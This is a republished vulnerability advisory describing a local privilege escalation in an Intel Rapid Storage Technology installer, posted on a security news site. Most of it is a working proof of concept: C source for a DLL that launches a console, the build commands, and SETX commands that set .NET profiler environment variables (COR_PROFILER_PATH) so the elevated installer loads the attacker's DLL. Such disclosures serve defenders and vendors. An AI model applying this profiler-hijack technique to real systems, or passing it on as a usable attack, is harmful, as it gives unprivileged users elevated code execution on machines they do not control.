Intel RST User Interface / Driver Privilege Escalation ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 24th, 2021 📆 | 6473 Views ⚑

0

Intel RST User Interface / Driver Privilege Escalation ≈ Packet Storm

Hi @ll,

more than 2 years ago I disclosed 2 vulnerabilities leading to
local escalation of privilege in the
Intel® Rapid Storage Technology (Intel® RST) User Interface and Driver:
see
and

Intel fixed this vulnerability only in their executable installer.

Some time later Intel rewrote or rebuilt this installer (see
y>
for its current version 18.0.1.1138, published 10/15/2020)
and incorporated the second vulnerability.

CVSS 3.0 score: 8.2 High
CVSS 3.0 vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Demonstration:
~~~~~~~~~~~~~~

0. Save the following source as sentinel.c in an arbitrary directory:

— sentinel.c —
// Copyright (C) 2004-2021, Stefan Kanthak

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include

const STARTUPINFO si = {sizeof(si)};

__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE hModule,
DWORD dwReason,
CONTEXT *lpContext)
{
WCHAR szCmdLine[] = L”CMD.exe /D /K WHOAMI.exe /ALL”;

PROCESS_INFORMATION pi;

if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,
NULL, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}

return TRUE;
}
— EOF —

1. Start the command prompt of the 32-bit Windows Software Development Kit,
then run the following command lines to compile sentinel.c and link it
as sentinel.dll:

cl.exe /Zl /W4 /O2 /GAFy /c sentinel.c
link.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /RELEASE /SUBSYSTEM:Windows sentinel.obj
kernel32.lib

ALTERNATIVE for steps 0 and 1:

1. Download
and save it in an arbitrary directory.

2. Logon with the user account created during Windows setup.

3. Start a command prompt (unelevated!) and run the following command lines
(replace with the pathname of the directory where you built
or saved sentinel.dll):

SETX.exe COR_ENABLE_PROFILING 1
SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
SETX.exe COR_PROFILER_PATH sentinel.dll

JFTR: this is just one method to set these environment variables without
the need to elevate!

4. Download and
save it in an arbitrary directory.

5. Execute SetupRST.exe per double-click, acknowledge the UAC prompt, then
admire the console windows showing the output of WHOAMI.exe running
elevated.

stay tuned, and FAR AWAY from vulnerable crap built by Intel
Stefan Kanthak

Source link

Tagged with:



Leave a Reply